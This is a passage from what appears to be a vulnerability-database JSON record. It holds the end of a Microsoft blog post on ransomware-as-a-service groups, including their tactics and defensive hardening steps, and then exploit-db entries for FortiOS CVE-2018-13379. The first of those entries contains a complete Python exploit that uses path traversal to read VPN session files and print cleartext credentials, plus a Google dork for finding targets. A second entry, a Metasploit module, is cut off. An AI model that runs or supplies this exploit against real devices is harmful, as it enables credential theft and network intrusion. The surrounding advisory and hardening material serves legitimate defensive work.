enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they preferred, DEV-0401 gains elevated credentials at the initial access stage of their attack.\n\nOnce inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.\n\nFigure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022\n\nBecause DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nLike many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay, however their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempt to pay. In a notable shift\u2014possibly related to victim payment issues\u2014DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.\n\n### DEV-0537: From extortion to destruction\n\nAn example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with an intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.\n\nOnce initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn\u2019t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks. \n\nDEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim\u2019s data and resources.\n\n## Defending against ransomware: Moving beyond protection by detection\n\nA durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks and detecting them. Ransomware attacks generate multiple, disparate security product alerts, but they could easily get lost or not responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks. \n\nAttackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven\u2019t changed much over the years. Therefore, a renewed focus on prevention is needed to curb the tide.\n\nRansomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.\n\n### Building credential hygiene\n\nMore than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment then can be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.\n\nCredential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne, and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn\u2019t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.\n\nToo often, a legacy configuration ensures that a mission-critical application works by giving the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can access. In organizations where the local administrator rights haven\u2019t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.\n\n**Here are some steps organizations can take to build credential hygiene:**\n\n * Aim to run services as Local System when administrative privileges are needed, as this allows applications to have high privileges locally but can\u2019t be used to move laterally. Run services as Network Service when accessing other resources.\n * Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.\n * Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn\u2019t be exposed on member servers or workstations.\n * Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups. Adding them to the local administrator group on a limited set of machines to keep an application running still reduces the scope of an attack as against running them as Domain Admin.\n * Randomize Local Administrator passwords with a tool like [Local Administrator Password S](<https://aka.ms/laps>)olution (LAPS) to prevent lateral movement using local accounts with shared passwords.\n * Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals get visibility into identity configurations and to identify and detect threats or compromised identities\n\n### Auditing credential exposure\n\nAuditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that was originally designed to provide network defenders with insight into the number of administrators in their environment. It can also be a powerful tool in reducing privileges tied to administrative account and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.\n\nMicrosoft has observed ransomware attackers also using BloodHound in attacks. When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they have access, to highly privileged accounts like domain admin accounts and global administrator accounts in Azure.\n\n### Prioritizing deployment of Active Directory updates\n\nSecurity patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities within one hour of being made public and as soon as those vulnerabilities are included in tools like Mimikatz. Ransomware activity groups also rapidly adopt vulnerabilities related to authentication, such as ZeroLogon and PetitPotam, especially when they are included in toolkits like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.\n\n### Cloud hardening\n\nAs attackers move towards cloud resources, it\u2019s important to secure cloud resources and identities as well as on-premises accounts. Here are ways organizations can harden cloud environments:\n\n**Cloud identity hardening**\n\n * Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:\n * Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.\n * Ensure that \u201cbreak glass\u201d account passwords are stored offline and configure honey-token activity for account usage.\n * Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft\u2019s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).\n * Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.\n * Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).\n\n**Multifactor authentication (MFA)**\n\n * Enforce MFA on all accounts, remove users excluded from MFA, and strictly r[equire MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.\n * Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.\n * [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.\n * Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA).\n * For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking \u201cYes\u201d on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.\n * Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).\n\n**Cloud admins**\n\n * Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.\n * Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).\n\n### Addressing security blind spots\n\nIn almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn\u2019t protected by antivirus or EDR solutions. It\u2019s important to understand that the lack security controls on these systems that have access to highly privileged credentials act as blind spots that allow attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.\n\nOrganizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn\u2019t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.\n\nFor Microsoft 365 Defender customers, the following checklist eliminates security blind spots:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.\n * Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.\n * Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.\n * [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.\n\n### Reducing the attack surface\n\nMicrosoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks. In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * Common entry vectors:\n * [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * Ransomware deployment and lateral movement stage (in order of impact based on the stage in attack they prevent):\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n * [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)\n\nIn addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reduce the attack surface for many human-operated ransomware attacks and other threats.\n\n### Hardening internet-facing assets and understanding your perimeter\n\nOrganizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:\n\n * Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.\n * Block Remote IT management tools such as Teamviewer, Splashtop, Remote Manipulator System, Anydesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if not in use in your environment. If these systems are used in your environment, enforce security settings where possible to implement MFA.\n\nRansomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched, partially patched, or because access brokers had established persistence on a previously compromised systems despite it later being patched.\n\nSome observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:\n\n * Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)\n * [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), [CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)\n * SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)\n * Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)\n * Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n * Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)\n * FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)\n * Apache log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\nRansomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.\n\n## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks\n\nThe multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.\n\nMicrosoft 365 Defender\u2019s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&amp;CK\u00ae Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques. To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.\n\n[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)\n\nIn line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we&#x27;re introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.\n\nJoin our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&amp;A. [Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)\n\nThe post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-09T13:00:00", "type": "mssecure", "title": "Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-05-09T13:00:00", "id": "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "href": "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T06:09:13", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-19T00:00:00", "type": "exploitdb", "title": "Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-13379", "CVE-2018-13379"], "modified": "2019-08-19T00:00:00", "id": "EDB-ID:47288", "href": "https://www.exploit-db.com/exploits/47288", "sourceData": "# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text.\r\n# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\"\r\n# Date: 17/08/2019\r\n# Exploit Author: Carlos E. Vieira\r\n# Vendor Homepage: https://www.fortinet.com/\r\n# Software Link: https://www.fortinet.com/products/fortigate/fortios.html\r\n# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).\r\n# Tested on: 5.6.6\r\n# CVE : CVE-2018-13379\r\n\r\n# Exploit SSLVPN Fortinet - FortiOs\r\n#!/usr/bin/env python\r\nimport requests, sys, time\r\nimport urllib3\r\nurllib3.disable_warnings()\r\n\r\n\r\ndef leak(host, port):\r\n\tprint(\"[!] Leak information...\")\r\n\ttry:\r\n\t\turl = \"https://\"+host+\":\"+port+\"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\"\r\n\t\theaders = {\"User-Agent\": \"Mozilla/5.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Upgrade-Insecure-Requests\": \"1\"}\t\t\r\n\t\tr=requests.get(url, headers=headers, verify=False, stream=True)\r\n\t\timg=r.raw.read()\r\n\t\tif \"var fgt_lang =\" in str(img):\r\n\t\t\twith open(\"sslvpn_websession_\"+host+\".dat\", 'w') as f:\r\n\t\t\t\tf.write(img)\t\t\r\n\t\t\tprint(\"[>] Save to file ....\")\r\n\t\t\tparse(host)\r\n\t\t\tprint(\"\\n\")\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\texcept requests.exceptions.ConnectionError:\r\n\t\treturn False\r\ndef is_character_printable(s):\r\n\treturn all((ord(c) < 127) and (ord(c) >= 32) for c in s)\r\n\r\ndef is_printable(byte):\r\n\tif is_character_printable(byte):\r\n \t\treturn byte\r\n \telse:\r\n \t\treturn '.' \r\n\r\ndef read_bytes(host, chunksize=8192):\r\n\tprint(\"[>] Read bytes from > \" + \"sslvpn_websession\"+host+\".dat\")\r\n\twith open(\"sslvpn_websession_\"+host+\".dat\", \"rb\") as f:\r\n \t\twhile True:\r\n \t\tchunk = f.read(chunksize)\r\n \t\tif chunk:\r\n \t\t\tfor b in chunk:\r\n \t\t\t\tyield b\r\n \t\telse:\r\n \t\t\tbreak\r\ndef parse(host):\r\n print(\"[!] Parsing Information...\")\r\n memory_address = 0\r\n ascii_string = \"\"\r\n for byte in read_bytes(host):\r\n \tascii_string = ascii_string + is_printable(byte)\r\n\tif memory_address%61 == 60:\r\n\t\tif ascii_string!=\".............................................................\":\r\n\t \t\tprint ascii_string\r\n\t \tascii_string = \"\"\r\n\tmemory_address = memory_address + 1\r\n\r\ndef check(host, port):\r\n print(\"[!] Check vuln...\")\r\n uri = \"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\"\r\n try:\r\n r = requests.get(\"https://\" + host + \":\" + port + uri, verify=False)\r\n if(r.status_code == 200):\r\n return True\r\n elif(r.status_code == 404):\r\n return False\r\n else:\r\n return False\r\n except:\r\n return False\r\ndef main(host, port):\r\n print(\"[+] Start exploiting....\")\r\n vuln = check(host, port)\r\n if(vuln):\r\n print(\"[+] Target is vulnerable!\")\r\n bin_file = leak(host, port)\r\n else:\r\n print(\"[X] Target not vulnerable.\")\r\n\r\nif __name__ == \"__main__\":\r\n\r\n if(len(sys.argv) < 3):\r\n print(\"Use: python {} ip/dns port\".format(sys.argv[0]))\r\n else:\r\n host = sys.argv[1]\r\n port = sys.argv[2]\r\n main(host, port)", "sourceHref": "https://www.exploit-db.com/download/47288", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-16T04:11:34", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-19T00:00:00", "type": "exploitdb", "title": "Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-13379", "CVE-2018-13379"], "modified": "2019-08-19T00:00:00", "id": "EDB-ID:47287", "href": "https://www.exploit-db.com/exploits/47287", "sourceData": "# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text.\r\n# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\"\r\n# Date: 17/08/2019\r\n# Exploit Author: Carlos E. Vieira\r\n# Vendor Homepage: https://www.fortinet.com/\r\n# Software Link: https://www.fortinet.com/products/fortigate/fortios.html\r\n# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).\r\n# Tested on: 5.6.6\r\n# CVE : CVE-2018-13379\r\n\r\nrequire 'msf/core'\r\nclass MetasploitModule < Msf::Auxiliary\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Post::File \r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 